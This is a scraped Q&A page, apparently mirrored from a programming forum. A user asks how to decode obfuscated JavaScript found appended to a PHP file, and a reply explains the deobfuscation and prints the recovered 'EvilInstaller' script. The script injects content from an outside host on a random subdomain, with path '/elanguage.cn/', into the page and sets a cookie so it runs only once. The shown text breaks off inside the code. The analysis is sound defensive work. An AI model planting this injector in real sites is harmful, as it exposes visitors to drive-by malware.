How would you reverse engineer this?

后端 未结 7 747
我在风中等你
我在风中等你 2021-02-10 13:54

I\'ve got some code that was at the bottom of a php file that is in javascript. It goes through lots of weird contortions like converting hex to ascii then doing regex replacem

7条回答
  •  时光说笑
    2021-02-10 14:00

    You can just go through it stage by stage - since it's Javascript, and it's interpreted, it needs to be its own decryptor. If you have access to a command-line Javascript interpreter (such as the Console in Firebug), this will be fairly straightforward.

    I'll have a look and see what comes up.

    Edit I've got through most of it - it seems like the final step is non-trivial, probably because it involves "argument.callee". Anyway I've put up what I have so far on Pastebin.

    Interestingly I found the hardest part of this was giving the gibberish variables proper names. It reminded me of a crossword, or sudoku, where you know how things are related, but you can't definitively assign something until you work out what its dependant parts are. :-) I'm sure that if someone recognises the algorithm they can give the parts more meaningful names, but at the bit where there's a lot of XORing going on, there are two temporary variables that I've just left as their default names since I don't know enough context to give them useful ones.

    Final edit: The 'arguments.callee' bit became easy when I realised I could just pass in the raw text that I'd ironically just been decoding (it's quite a clever technique, so that normal deobfuscation won't work because of course once you rename the variables, etc, the value is different). Anyway, here's your script in full:

    
        function EvilInstaller(){};
        EvilInstaller.prototype = {
            getFrameURL : function() {
                var dlh=document.location.host;
                return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.host + this.path;
            },
            path:'/elanguage.cn/',
            cookieValue:1,
            setCookie : function(name, value) {
                var d= new Date();
                d.setTime(new Date().getTime() + 86400000);
                document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString();
            },
            install : function() {
                if (!this.alreadyInstalled()) {
                    var s = "
    " try { document.open(); document.write(s); document.close(); } catch(e) { document.write("" + s + "") } this.setCookie(this.cookieName, this.cookieValue); } }, getRandString : function() { var l=16,c='0Z1&2Q3Z4*5&6Z7Q8*9)a*b*cQdZeQf*'.replace(/[ZQ&\*\)]/g, ''); var o=''; for (var i=0;i

提交回复
热议问题